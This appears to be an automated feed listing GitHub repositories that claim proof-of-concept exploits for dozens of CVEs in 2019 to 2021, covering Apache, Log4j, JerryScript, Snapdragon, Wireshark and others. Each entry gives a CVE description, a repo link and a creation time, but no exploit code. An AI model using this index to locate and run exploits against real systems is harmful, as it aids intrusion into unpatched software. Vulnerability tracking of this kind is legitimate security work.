**PoC for exploiting CVE-2019-17567 : Apache HTTP Server versions 2.4.6 to 2.4.46 mod_proxy_wstunnel configured on an URL that is not necessarily Upgraded by the origin server was tunneling the whole connection regardless, thus allowing for subsequent requests on the same connection to pass through with no HTTP validation, authentication or authorization possibly configured.** : [PwnCast/CVE-2019-17567](https://github.com/PwnCast/CVE-2019-17567) create time: 2021-06-18T10:18:42Z

**PoC for exploiting CVE-2019-12405 : Improper authentication is possible in Apache Traffic Control versions 3.0.0 and 3.0.1 if LDAP is enabled for login in the Traffic Ops API component. Given a username for a user that can be authenticated via LDAP, it is possible to improperly authenticate as that user without that user's correct password.** : [PwnCast/CVE-2019-12405](https://github.com/PwnCast/CVE-2019-12405) create time: 2021-06-18T10:07:28Z

**PoC for exploiting CVE-2020-22790 : Authenticated Stored XSS in FME Server versions 2019.2 and 2020.0 Beta allows a remote attacker to execute codeby injecting arbitrary web script or HTML via modifying the name of the users. The XSS is executed when an administrator access the logs.** : [PwnCast/CVE-2020-22790](https://github.com/PwnCast/CVE-2020-22790) create time: 2021-06-18T10:01:08Z

**PoC for exploiting CVE-2020-22789 : Unauthenticated Stored XSS in FME Server versions 2019.2 and 2020.0 Beta allows a remote attacker to gain admin privileges by injecting arbitrary web script or HTML via the login page. The XSS is executed when an administrator accesses the logs.** : [PwnCast/CVE-2020-22789](https://github.com/PwnCast/CVE-2020-22789) create time: 2021-06-18T10:00:31Z

**PoC for exploiting CVE-2020-13954 : By default, Apache CXF creates a /services page containing a listing of the available endpoint names and addresses. This webpage is vulnerable to a reflected Cross-Site Scripting (XSS) attack via the styleSheetPath, which allows a malicious actor to inject javascript into the web page. This vulnerability affects all versions of Apache CXF prior to 3.4.1 and 3.3.8. Please note that this is a separate issue to CVE-2019-17573.** : [PwnCast/CVE-2020-13954](https://github.com/PwnCast/CVE-2020-13954) create time: 2021-06-18T09:58:56Z

**PoC for exploiting CVE-2019-12423 : Apache CXF ships with a OpenId Connect JWK Keys service, which allows a client to obtain the public keys in JWK format, which can then be used to verify the signature of tokens issued by the service. Typically, the service obtains the public key from a local keystore (JKS/PKCS12) by specifing the path of the keystore and the alias of the keystore entry. This case is not vulnerable. However it is also possible to obtain the keys from a JWK keystore file, by setting the configuration parameter "rs.security.keystore.type" to "jwk". For this case all keys are returned in this file "as is", including all private key and secret key credentials. This is an obvious security risk if the user has configured the signature keystore file with private or secret key credentials. From CXF 3.3.5 and 3.2.12, it is mandatory to specify an alias corresponding to the id of the key in the JWK file, and only this key is returned. In addition, any private key information is omitted by default. "oct" keys, which contain secret keys, are not returned at all.** : [PwnCast/CVE-2019-12423](https://github.com/PwnCast/CVE-2019-12423) create time: 2021-06-18T09:57:53Z

**PoC for exploiting CVE-2019-17573 : By default, Apache CXF creates a /services page containing a listing of the available endpoint names and addresses. This webpage is vulnerable to a reflected Cross-Site Scripting (XSS) attack, which allows a malicious actor to inject javascript into the web page. Please note that the attack exploits a feature which is not typically not present in modern browsers, who remove dot segments before sending the request. However, Mobile applications may be vulnerable.** : [PwnCast/CVE-2019-17573](https://github.com/PwnCast/CVE-2019-17573) create time: 2021-06-18T09:57:47Z

**PoC for exploiting CVE-2019-12419 : Apache CXF before 3.3.4 and 3.2.11 provides all of the components that are required to build a fully fledged OpenId Connect service. There is a vulnerability in the access token services, where it does not validate that the authenticated principal is equal to that of the supplied clientId parameter in the request. If a malicious client was able to somehow steal an authorization code issued to another client, then they could exploit this vulnerability to obtain an access token for the other client.** : [PwnCast/CVE-2019-12419](https://github.com/PwnCast/CVE-2019-12419) create time: 2021-06-18T09:57:40Z

**PoC for exploiting CVE-2019-12406 : Apache CXF before 3.3.4 and 3.2.11 does not restrict the number of message attachments present in a given message. This leaves open the possibility of a denial of service type attack, where a malicious user crafts a message containing a very large number of message attachments. From the 3.3.4 and 3.2.11 releases, a default limit of 50 message attachments is enforced. This is configurable via the message property "attachment-max-count".** : [PwnCast/CVE-2019-12406](https://github.com/PwnCast/CVE-2019-12406) create time: 2021-06-18T09:57:26Z

**PoC for exploiting CVE-2019-19890 : An issue was discovered on Humax Wireless Voice Gateway HGB10R-2 20160817_1855 devices. Admin credentials are sent over cleartext HTTP.** : [PwnCast/CVE-2019-19890](https://github.com/PwnCast/CVE-2019-19890) create time: 2021-06-18T09:56:11Z

**PoC for exploiting CVE-2019-25046 : The Web Client in Cerberus FTP Server Enterprise before 10.0.19 and 11.x before 11.0.4 allows XSS via an SVG document.** : [PwnCast/CVE-2019-25046](https://github.com/PwnCast/CVE-2019-25046) create time: 2021-06-18T09:55:10Z

**PoC for exploiting CVE-2019-17571 : Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget when listening to untrusted network traffic for log data. This affects Log4j versions up to 1.2 up to 1.2.17.** : [PwnCast/CVE-2019-17571](https://github.com/PwnCast/CVE-2019-17571) create time: 2021-06-18T09:53:33Z

**PoC for exploiting CVE-2020-15379 : Brocade SANnav before v.2.1.0a could allow remote attackers cause a denial-of-service condition due to a lack of proper validation, of the length of user-supplied data as name for custom field name.** : [PwnCast/CVE-2020-15379](https://github.com/PwnCast/CVE-2020-15379) create time: 2021-06-18T10:20:01Z

**PoC for exploiting CVE-2020-9489 : A carefully crafted or corrupt file may trigger a System.exit in Tika's OneNote Parser. Crafted or corrupted files can also cause out of memory errors and/or infinite loops in Tika's ICNSParser, MP3Parser, MP4Parser, SAS7BDATParser, OneNoteParser and ImageParser. Apache Tika users should upgrade to 1.24.1 or later. The vulnerabilities in the MP4Parser were partially fixed by upgrading the com.googlecode:isoparser:1.1.22 dependency to org.tallison:isoparser:1.9.41.2. For unrelated security reasons, we upgraded org.apache.cxf to 3.3.6 as part of the 1.24.1 release.** : [PwnCast/CVE-2020-9489](https://github.com/PwnCast/CVE-2020-9489) create time: 2021-06-18T10:17:47Z

**PoC for exploiting CVE-2020-36385 : An issue was discovered in the Linux kernel before 5.10. drivers/infiniband/core/ucma.c has a use-after-free because the ctx is reached via the ctx_list in some ucma_migrate_id situations where ucma_close is called, aka CID-f5449e74802c.** : [PwnCast/CVE-2020-36385](https://github.com/PwnCast/CVE-2020-36385) create time: 2021-06-18T10:16:03Z

**PoC for exploiting CVE-2020-1719 : A flaw was found in wildfly. The EJBContext principle is not popped back after invoking another EJB using a different Security Domain. The highest threat from this vulnerability is to data confidentiality and integrity. Versions before wildfly 20.0.0.Final are affected.** : [PwnCast/CVE-2020-1719](https://github.com/PwnCast/CVE-2020-1719) create time: 2021-06-18T10:15:56Z

**PoC for exploiting CVE-2020-1690 : An improper authorization flaw was discovered in openstack-selinux's applied policy where it does not prevent a non-root user in a container from privilege escalation. A non-root attacker in one or more Red Hat OpenStack (RHOSP) containers could send messages to the dbus. With access to the dbus, the attacker could start or stop services, possibly causing a denial of service. Versions before openstack-selinux 0.8.24 are affected.** : [PwnCast/CVE-2020-1690](https://github.com/PwnCast/CVE-2020-1690) create time: 2021-06-18T10:15:16Z

**PoC for exploiting CVE-2020-23303 : There is a heap-buffer-overflow at jmem-poolman.c:165 in jmem_pools_collect_empty in JerryScript 2.2.0.** : [PwnCast/CVE-2020-23303](https://github.com/PwnCast/CVE-2020-23303) create time: 2021-06-18T10:14:48Z

**PoC for exploiting CVE-2020-11176 : While processing server certificate from IPSec server, certificate validation for subject alternative name API can cause heap overflow which can lead to memory corruption in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile** : [PwnCast/CVE-2020-11176](https://github.com/PwnCast/CVE-2020-11176) create time: 2021-06-18T10:14:35Z

**PoC for exploiting CVE-2020-24662 : SmartStream Transaction Lifecycle Management (TLM) Reconciliation Premium (RP) <3.1.0 allows XSS. This was fixed in TLM RP 3.1.0.** : [PwnCast/CVE-2020-24662](https://github.com/PwnCast/CVE-2020-24662) create time: 2021-06-18T10:14:15Z

**PoC for exploiting CVE-2020-27384 : The Gw2-64.exe in Guild Wars 2 launcher version 106916 suffers from an elevation of privileges vulnerability which can be used by an "Authenticated User" to modify the existing executable file with a binary of his choice. The vulnerability exist due to the improper permissions, with the 'F' flag (Full Control) for 'Everyone' group, making the entire directory 'Guild Wars 2' and its files and sub-dirs world-writable.** : [PwnCast/CVE-2020-27384](https://github.com/PwnCast/CVE-2020-27384) create time: 2021-06-18T10:14:06Z

**PoC for exploiting CVE-2020-26515 : An insufficiently protected credentials issue was discovered in Intland codeBeamer ALM 10.x through 10.1.SP4. The remember-me cookie (CB_LOGIN) issued by the application contains the encrypted user's credentials. However, due to a bug in the application code, those credentials are encrypted using a NULL encryption key.** : [PwnCast/CVE-2020-26515](https://github.com/PwnCast/CVE-2020-26515) create time: 2021-06-18T10:13:59Z

**PoC for exploiting CVE-2020-23306 : There is a stack-overflow at ecma-regexp-object.c:535 in ecma_regexp_match in JerryScript 2.2.0.** : [PwnCast/CVE-2020-23306](https://github.com/PwnCast/CVE-2020-23306) create time: 2021-06-18T10:13:53Z

**PoC for exploiting CVE-2020-23308 : There is an Assertion 'context_p->stack_top_uint8 == LEXER_EXPRESSION_START' at js-parser-expr.c:3565 in parser_parse_expression in JerryScript 2.2.0.** : [PwnCast/CVE-2020-23308](https://github.com/PwnCast/CVE-2020-23308) create time: 2021-06-18T10:13:40Z

**PoC for exploiting CVE-2020-26138 : In SilverStripe through 4.6.0-rc1, a FormField with square brackets in the field name skips validation.** : [PwnCast/CVE-2020-26138](https://github.com/PwnCast/CVE-2020-26138) create time: 2021-06-18T10:13:33Z

**PoC for exploiting CVE-2020-26136 : In SilverStripe through 4.6.0-rc1, GraphQL doesn't honour MFA (multi-factor authentication) when using basic authentication.** : [PwnCast/CVE-2020-26136](https://github.com/PwnCast/CVE-2020-26136) create time: 2021-06-18T10:13:27Z

**PoC for exploiting CVE-2020-23309 : There is an Assertion 'context_p->stack_depth == context_p->context_stack_depth' failed at js-parser-statm.c:2756 in parser_parse_statements in JerryScript 2.2.0.** : [PwnCast/CVE-2020-23309](https://github.com/PwnCast/CVE-2020-23309) create time: 2021-06-18T10:13:20Z

**PoC for exploiting CVE-2020-13938 : Apache HTTP Server versions 2.4.0 to 2.4.46 Unprivileged local users can stop httpd on Windows** : [PwnCast/CVE-2020-13938](https://github.com/PwnCast/CVE-2020-13938) create time: 2021-06-18T10:13:14Z

**PoC for exploiting CVE-2020-23310 : There is an Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at js-parser-statm.c:733 in parser_parse_function_statement in JerryScript 2.2.0.** : [PwnCast/CVE-2020-23310](https://github.com/PwnCast/CVE-2020-23310) create time: 2021-06-18T10:13:07Z

**PoC for exploiting CVE-2020-23321 : There is a heap-buffer-overflow at lit-strings.c:431 in lit_read_code_unit_from_utf8 in JerryScript 2.2.0.** : [PwnCast/CVE-2020-23321](https://github.com/PwnCast/CVE-2020-23321) create time: 2021-06-18T10:13:00Z

**PoC for exploiting CVE-2020-23323 : There is a heap-buffer-overflow at re-parser.c in re_parse_char_escape in JerryScript 2.2.0.** : [PwnCast/CVE-2020-23323](https://github.com/PwnCast/CVE-2020-23323) create time: 2021-06-18T10:12:54Z

**PoC for exploiting CVE-2020-13950 : Apache HTTP Server versions 2.4.41 to 2.4.46 mod_proxy_http can be made to crash (NULL pointer dereference) with specially crafted requests using both Content-Length and Transfer-Encoding headers, leading to a Denial of Service** : [PwnCast/CVE-2020-13950](https://github.com/PwnCast/CVE-2020-13950) create time: 2021-06-18T10:12:47Z

**PoC for exploiting CVE-2020-14380 : An account takeover flaw was found in Red Hat Satellite 6.7.2 onward. A potential attacker with proper authentication to the relevant external authentication source (SSO or Open ID) can claim the privileges of already existing local users of Satellite.** : [PwnCast/CVE-2020-14380](https://github.com/PwnCast/CVE-2020-14380) create time: 2021-06-18T10:12:21Z

**PoC for exploiting CVE-2020-11259 : Memory corruption due to lack of validation of pointer arguments passed to Trustzone BSP in Snapdragon Wired Infrastructure and Networking** : [PwnCast/CVE-2020-11259](https://github.com/PwnCast/CVE-2020-11259) create time: 2021-06-18T10:11:53Z

**PoC for exploiting CVE-2020-11256 : Memory corruption due to lack of check of validation of pointer to buffer passed to trustzone in Snapdragon Wired Infrastructure and Networking** : [PwnCast/CVE-2020-11256](https://github.com/PwnCast/CVE-2020-11256) create time: 2021-06-18T10:11:47Z

**PoC for exploiting CVE-2020-11257 : Memory corruption due to lack of validation of pointer arguments passed to TrustZone BSP in Snapdragon Wired Infrastructure and Networking** : [PwnCast/CVE-2020-11257](https://github.com/PwnCast/CVE-2020-11257) create time: 2021-06-18T10:11:41Z

**PoC for exploiting CVE-2020-11258 : Memory corruption due to lack of validation of pointer arguments passed to Trustzone BSP in Snapdragon Wired Infrastructure and Networking** : [PwnCast/CVE-2020-11258](https://github.com/PwnCast/CVE-2020-11258) create time: 2021-06-18T10:11:34Z

**PoC for exploiting CVE-2020-23322 : There is an Assertion in 'context_p->token.type == LEXER_RIGHT_BRACE || context_p->token.type == LEXER_ASSIGN || context_p->token.type == LEXER_COMMA' in parser_parse_object_initializer in JerryScript 2.2.0.** : [PwnCast/CVE-2020-23322](https://github.com/PwnCast/CVE-2020-23322) create time: 2021-06-18T10:11:28Z

**PoC for exploiting CVE-2020-11261 : Memory corruption due to improper check to return error when user application requests memory allocation of a huge size in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables** : [PwnCast/CVE-2020-11261](https://github.com/PwnCast/CVE-2020-11261) create time: 2021-06-18T10:11:21Z

**PoC for exploiting CVE-2020-23311 : There is an Assertion 'context_p->token.type == LEXER_RIGHT_BRACE || context_p->token.type == LEXER_ASSIGN || context_p->token.type == LEXER_COMMA' failed at js-parser-expr.c:3230 in parser_parse_object_initializer in JerryScript 2.2.0.** : [PwnCast/CVE-2020-23311](https://github.com/PwnCast/CVE-2020-23311) create time: 2021-06-18T10:11:15Z

**PoC for exploiting CVE-2020-11262 : A race between command submission and destroying the context can cause an invalid context being added to the list leads to use after free issue. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables** : [PwnCast/CVE-2020-11262](https://github.com/PwnCast/CVE-2020-11262) create time: 2021-06-18T10:11:09Z

**PoC for exploiting CVE-2020-23319 : There is an Assertion in '(flags >> CBC_STACK_ADJUST_SHIFT) >= CBC_STACK_ADJUST_BASE || (CBC_STACK_ADJUST_BASE - (flags >> CBC_STACK_ADJUST_SHIFT)) <= context_p->stack_depth' in parser_emit_cbc_backward_branch in JerryScript 2.2.0.** : [PwnCast/CVE-2020-23319](https://github.com/PwnCast/CVE-2020-23319) create time: 2021-06-18T10:11:02Z

**PoC for exploiting CVE-2021-27612 : In specific situations SAP GUI for Windows until and including 7.60 PL9, 7.70 PL0, forwards a user to specific malicious website which could contain malware or might lead to phishing attacks to steal credentials of the victim.** : [PwnCast/CVE-2021-27612](https://github.com/PwnCast/CVE-2021-27612) create time: 2021-06-18T10:20:08Z

**PoC for exploiting CVE-2021-22116 : RabbitMQ all versions prior to 3.8.16 are prone to a denial of service vulnerability due to improper input validation in AMQP 1.0 client connection endpoint. A malicious user can exploit the vulnerability by sending malicious AMQP messages to the target RabbitMQ instance having the AMQP 1.0 plugin enabled.** : [PwnCast/CVE-2021-22116](https://github.com/PwnCast/CVE-2021-22116) create time: 2021-06-18T10:19:54Z

**PoC for exploiting CVE-2021-32553 : It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-17 package apport hooks, it could expose private data to other local users.** : [PwnCast/CVE-2021-32553](https://github.com/PwnCast/CVE-2021-32553) create time: 2021-06-18T10:19:02Z

**PoC for exploiting CVE-2021-32554 : It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the xorg package apport hooks, it could expose private data to other local users.** : [PwnCast/CVE-2021-32554](https://github.com/PwnCast/CVE-2021-32554) create time: 2021-06-18T10:18:55Z

**PoC for exploiting CVE-2021-32555 : It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the xorg-hwe-18.04 package apport hooks, it could expose private data to other local users.** : [PwnCast/CVE-2021-32555](https://github.com/PwnCast/CVE-2021-32555) create time: 2021-06-18T10:18:49Z

**PoC for exploiting CVE-2021-26928 : ** DISPUTED ** BIRD through 2.0.7 does not provide functionality for password authentication of BGP peers. Because of this, products that use BIRD (which may, for example, include Tigera products in some configurations, as well as products of other vendors) may have been susceptible to route redirection for Denial of Service and/or Information Disclosure. NOTE: a researcher has asserted that the behavior is within Tigera’s area of responsibility; however, Tigera disagrees.** : [PwnCast/CVE-2021-26928](https://github.com/PwnCast/CVE-2021-26928) create time: 2021-06-18T10:18:22Z

**PoC for exploiting CVE-2021-31837 : Memory corruption vulnerability in the driver file component in McAfee GetSusp prior to 4.0.0 could allow a program being investigated on the local machine to trigger a buffer overflow in GetSusp, leading to the execution of arbitrary code, potentially triggering a BSOD.** : [PwnCast/CVE-2021-31837](https://github.com/PwnCast/CVE-2021-31837) create time: 2021-06-18T10:18:01Z

**PoC for exploiting CVE-2021-22118 : In Spring Framework, versions 5.2.x prior to 5.2.15 and versions 5.3.x prior to 5.3.7, a WebFlux application is vulnerable to a privilege escalation: by (re)creating the temporary storage directory, a locally authenticated malicious user can read or modify files that have been uploaded to the WebFlux application, or overwrite arbitrary files with multipart request data.** : [PwnCast/CVE-2021-22118](https://github.com/PwnCast/CVE-2021-22118) create time: 2021-06-18T10:17:54Z

**PoC for exploiting CVE-2021-20227 : A flaw was found in SQLite's SELECT query functionality (src/select.c). This flaw allows an attacker who is capable of running SQL queries locally on the SQLite database to cause a denial of service or possible code execution by triggering a use-after-free. The highest threat from this vulnerability is to system availability.** : [PwnCast/CVE-2021-20227](https://github.com/PwnCast/CVE-2021-20227) create time: 2021-06-18T10:17:41Z

**PoC for exploiting CVE-2021-21290 : Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty before version 4.1.59.Final there is a vulnerability on Unix-like systems involving an insecure temp file. When netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled. On unix-like systems, the temporary directory is shared between all user. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems. The method "File.createTempFile" on unix-like systems creates a random file, but, by default will create this file with the permissions "-rw-r--r--". Thus, if sensitive information is written to this file, other local users can read this information. This is the case in netty's "AbstractDiskHttpData" is vulnerable. This has been fixed in version 4.1.59.Final. As a workaround, one may specify your own "java.io.tmpdir" when you start the JVM or use "DefaultHttpDataFactory.setBaseDir(...)" to set the directory to something that is only readable by the current user.** : [PwnCast/CVE-2021-21290](https://github.com/PwnCast/CVE-2021-21290) create time: 2021-06-18T10:17:35Z

**PoC for exploiting CVE-2021-22112 : Spring Security 5.4.x prior to 5.4.4, 5.3.x prior to 5.3.8.RELEASE, 5.2.x prior to 5.2.9.RELEASE, and older unsupported versions can fail to save the SecurityContext if it is changed more than once in a single request.A malicious user cannot cause the bug to happen (it must be programmed in). However, if the application's intent is to only allow the user to run with elevated privileges in a small portion of the application, the bug can be leveraged to extend those privileges to the rest of the application.** : [PwnCast/CVE-2021-22112](https://github.com/PwnCast/CVE-2021-22112) create time: 2021-06-18T10:17:28Z

**PoC for exploiting CVE-2021-22883 : Node.js before 10.24.0, 12.21.0, 14.16.0, and 15.10.0 is vulnerable to a denial of service attack when too many connection attempts with an 'unknownProtocol' are established. This leads to a leak of file descriptors. If a file descriptor limit is configured on the system, then the server is unable to accept new connections and prevent the process also from opening, e.g. a file. If no file descriptor limit is configured, then this lead to an excessive memory usage and cause the system to run out of memory.** : [PwnCast/CVE-2021-22883](https://github.com/PwnCast/CVE-2021-22883) create time: 2021-06-18T10:17:21Z

**PoC for exploiting CVE-2021-22191 : Improper URL handling in Wireshark 3.4.0 to 3.4.3 and 3.2.0 to 3.2.11 could allow remote code execution via via packet injection or crafted capture file.** : [PwnCast/CVE-2021-22191](https://github.com/PwnCast/CVE-2021-22191) create time: 2021-06-18T10:17:15Z

**PoC for exploiting CVE-2021-21345 : XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker who has sufficient rights to execute commands of the host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16.** : [PwnCast/CVE-2021-21345](https://github.com/PwnCast/CVE-2021-21345) create time: 2021-06-18T10:17:08Z

**PoC for exploiting CVE-2021-22174 : Crash in USB HID dissector in Wireshark 3.4.0 to 3.4.2 allows denial of service via packet injection or crafted capture file** : [PwnCast/CVE-2021-22174](https://github.com/PwnCast/CVE-2021-22174) create time: 2021-06-18T10:17:04Z

**PoC for exploiting CVE-2021-22173 : Memory leak in USB HID dissector in Wireshark 3.4.0 to 3.4.2 allows denial of service via packet injection or crafted capture file** : [PwnCast/CVE-2021-22173](https://github.com/PwnCast/CVE-2021-22173) create time: 2021-06-18T10:16:57Z

**PoC for exploiting CVE-2021-33175 : EMQ X Broker versions prior to 4.2.8 are vulnerable to a denial of service attack as a result of excessive memory consumption due to the handling of untrusted inputs. These inputs cause the message broker to consume large amounts of memory, resulting in the application being terminated by the operating system.** : [PwnCast/CVE-2021-33175](https://github.com/PwnCast/CVE-2021-33175) create time: 2021-06-18T10:16:51Z

**PoC for exploiting CVE-2021-0482 : In BinderDiedCallback of MediaCodec.cpp, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-173791720** : [PwnCast/CVE-2021-0482](https://github.com/PwnCast/CVE-2021-0482) create time: 2021-06-18T10:16:45Z

**PoC for exploiting CVE-2021-0113 : Out of bounds write in the BMC firmware for Intel(R) Server Board M10JNP2SB before version EFI BIOS 7215, BMC 8100.01.08 may allow an unauthenticated user to potentially enable a denial of service via adjacent access.** : [PwnCast/CVE-2021-0113](https://github.com/PwnCast/CVE-2021-0113) create time: 2021-06-18T10:16:38Z

**PoC for exploiting CVE-2021-32651 : OneDev is a development operations platform. If the LDAP external authentication mechanism is enabled in OneDev versions 4.4.1 and prior, an attacker can manipulate a user search filter to send forged queries to the application and explore the LDAP tree using Blind LDAP Injection techniques. The specific payload depends on how the User Search Filter property is configured in OneDev. This issue was fixed in version 4.4.2.** : [PwnCast/CVE-2021-32651](https://github.com/PwnCast/CVE-2021-32651) create time: 2021-06-18T10:16:31Z

**PoC for exploiting CVE-2021-32924 : Invision Community (aka IPS Community Suite) before 4.6.0 allows eval-based PHP code injection by a moderator because the IPS\cms\modules\front\pages\_builder::previewBlock method interacts unsafely with the IPS\_Theme::runProcessFunction method.** : [PwnCast/CVE-2021-32924](https://github.com/PwnCast/CVE-2021-32924) create time: 2021-06-18T10:16:23Z

**PoC for exploiting CVE-2021-32923 : HashiCorp Vault and Vault Enterprise allowed the renewal of nearly-expired token leases and dynamic secret leases (specifically, those within 1 second of their maximum TTL), which caused them to be incorrectly treated as non-expiring during subsequent use. Fixed in 1.5.9, 1.6.5, and 1.7.2.** : [PwnCast/CVE-2021-32923](https://github.com/PwnCast/CVE-2021-32923) create time: 2021-06-18T10:16:17Z

**PoC for exploiting CVE-2021-1564 : Multiple vulnerabilities in the implementation of the Cisco Discovery Protocol and Link Layer Discovery Protocol (LLDP) for Cisco Video Surveillance 7000 Series IP Cameras could allow an unauthenticated, adjacent attacker to cause a memory leak, which could lead to a denial of service (DoS) condition on an affected device. These vulnerabilities are due to incorrect processing of certain Cisco Discovery Protocol and LLDP packets at ingress time. An attacker could exploit these vulnerabilities by sending crafted Cisco Discovery Protocol or LLDP packets to an affected device. A successful exploit could allow the attacker to cause the affected device to continuously consume memory, which could cause the device to crash and reload, resulting in a DoS condition. Note: Cisco Discovery Protocol and LLDP are Layer 2 protocols. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).** : [PwnCast/CVE-2021-1564](https://github.com/PwnCast/CVE-2021-1564) create time: 2021-06-18T10:16:10Z

**PoC for exploiting CVE-2021-23391 : This affects all versions of package calipso. It is possible for a malicious module to overwrite files on an arbitrary file system through the module install functionality.** : [PwnCast/CVE-2021-23391](https://github.com/PwnCast/CVE-2021-23391) create time: 2021-06-18T10:15:50Z

**PoC for exploiting CVE-2021-27635 : SAP NetWeaver AS for JAVA, versions - 7.20, 7.30, 7.31, 7.40, 7.50, allows an attacker authenticated as an administrator to connect over a network and submit a specially crafted XML file in the application because of missing XML Validation, this vulnerability enables attacker to fully compromise confidentiality by allowing them to read any file on the filesystem or fully compromise availability by causing the system to crash. The attack cannot be used to change any data so that there is no compromise as to integrity.** : [PwnCast/CVE-2021-27635](https://github.com/PwnCast/CVE-2021-27635) create time: 2021-06-18T10:15:43Z

**PoC for exploiting CVE-2021-32641 : auth0-lock is Auth0's signin solution. Versions of nauth0-lock before and including `11.30.0` are vulnerable to reflected XSS. An attacker can execute arbitrary code when the library's `flashMessage` feature is utilized and user input or data from URL parameters is incorporated into the `flashMessage` or the library's `languageDictionary` feature is utilized and user input or data from URL parameters is incorporated into the `languageDictionary`. The vulnerability is patched in version 11.30.1.** : [PwnCast/CVE-2021-32641](https://github.com/PwnCast/CVE-2021-32641) create time: 2021-06-18T10:15:36Z

**PoC for exploiting CVE-2021-31701 : Mintty before 3.4.7 mishandles Bracketed Paste Mode.** : [PwnCast/CVE-2021-31701](https://github.com/PwnCast/CVE-2021-31701) create time: 2021-06-18T10:15:30Z

**PoC for exploiting CVE-2021-32198 : EmTec ZOC before 8.02.2 allows \e[201~ pastes.** : [PwnCast/CVE-2021-32198](https://github.com/PwnCast/CVE-2021-32198) create time: 2021-06-18T10:15:23Z

**PoC for exploiting CVE-2021-33880 : The aaugustin websockets library before 9.1 for Python has an Observable Timing Discrepancy on servers when HTTP Basic Authentication is enabled with basic_auth_protocol_factory(credentials=...). An attacker may be able to guess a password via a timing attack.** : [PwnCast/CVE-2021-33880](https://github.com/PwnCast/CVE-2021-33880) create time: 2021-06-18T10:15:09Z

**PoC for exploiting CVE-2021-27626 : SAP Internet Graphics Service, versions - 7.20,7.20EXT,7.53,7.20_EX2,7.81, allows an unauthenticated attacker after retrieving an existing system state value can submit a malicious IGS request over a network which due to insufficient input validation in method CMiniXMLParser::Parse() which will trigger an internal memory corruption error in the system causing the system to crash and rendering it unavailable. In this attack, no data in the system can be viewed or modified.** : [PwnCast/CVE-2021-27626](https://github.com/PwnCast/CVE-2021-27626) create time: 2021-06-18T10:15:01Z

**Git-LFS RCE Test** : [FrostsaberX/CVE-2020-27955](https://github.com/FrostsaberX/CVE-2020-27955) create time: 2021-06-17T20:04:33Z

**no description** : [3hydraking/CVE-2019-14287](https://github.com/3hydraking/CVE-2019-14287) create time: 2021-06-17T12:33:08Z

**A PoC for CVE-2017-14980 which works on systems with DEP enabled** : [bmdyy/CVE-2017-14980](https://github.com/bmdyy/CVE-2017-14980) create time: 2021-06-17T09:28:57Z

**Zoho ManageEngine ServiceDesk Plus MSP - Active Directory User Enumeration (CVE-2021-31159)** : [ricardojoserf/CVE-2021-31159](https://github.com/ricardojoserf/CVE-2021-31159) create time: 2021-03-19T18:28:43Z

**PoC for exploiting CVE-2017-7670 : The Traffic Router component of the incubating Apache Traffic Control project is vulnerable to a Slowloris style Denial of Service attack. TCP connections made on the configured DNS port will remain in the ESTABLISHED state until the client explicitly closes the connection or Traffic Router is restarted. If connections remain in the ESTABLISHED state indefinitely and accumulate in number to match the size of the thread pool dedicated to processing DNS requests, the thread pool becomes exhausted. Once the thread pool is exhausted, Traffic Router is unable to service any DNS request, regardless of transport protocol.** : [PwnCast/CVE-2017-7670](https://github.com/PwnCast/CVE-2017-7670) create time: 2021-06-16T23:29:51Z

**PoC for exploiting CVE-2020-17522 : When ORT (now via atstccfg) generates ip_allow.config files in Apache Traffic Control 3.0.0 to 3.1.0 and 4.0.0 to 4.1.0, those files include permissions that allow bad actors to push arbitrary content into and remove arbitrary content from CDN cache servers. Additionally, these permissions are potentially extended to IP addresses outside the desired range, resulting in them being granted to clients possibly outside the CDN arcitechture.** : [PwnCast/CVE-2020-17522](https://github.com/PwnCast/CVE-2020-17522) create time: 2021-06-16T23:29:44Z

**no description** : [KZMachine/CVERT_2021](https://github.com/KZMachine/CVERT_2021) create time: 2021-06-17T00:34:33Z

**no description** : [secnigma/CVE-2021-3560-Polkit-Privilege-Esclation](https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation) create time: 2021-06-14T20:08:20Z

**✨ HAProxy ve Keepalived konusunu load balancer ve cluster'a ek olarak güvenlik(zayıf SSL/Kripto Kullanımı (LOGJAM) (CVE-2015-4000) zafiyeti önlemi) ve yüksek yüklere karşı ele alır.** : [fatlan/HAProxy-Keepalived-Sec-HighLoads](https://github.com/fatlan/HAProxy-Keepalived-Sec-HighLoads) create time: 2021-04-24T12:51:27Z

**no description** : [repos13579/labCVE-2018-6574](https://github.com/repos13579/labCVE-2018-6574) create time: 2021-06-16T10:45:39Z

**no description** : [OLAOLAOLA789/CVE-2018-6574](https://github.com/OLAOLAOLA789/CVE-2018-6574) create time: 2021-06-15T08:52:08Z

**no description** : [spyx/cve-2019-17240](https://github.com/spyx/cve-2019-17240) create time: 2021-06-15T05:51:05Z

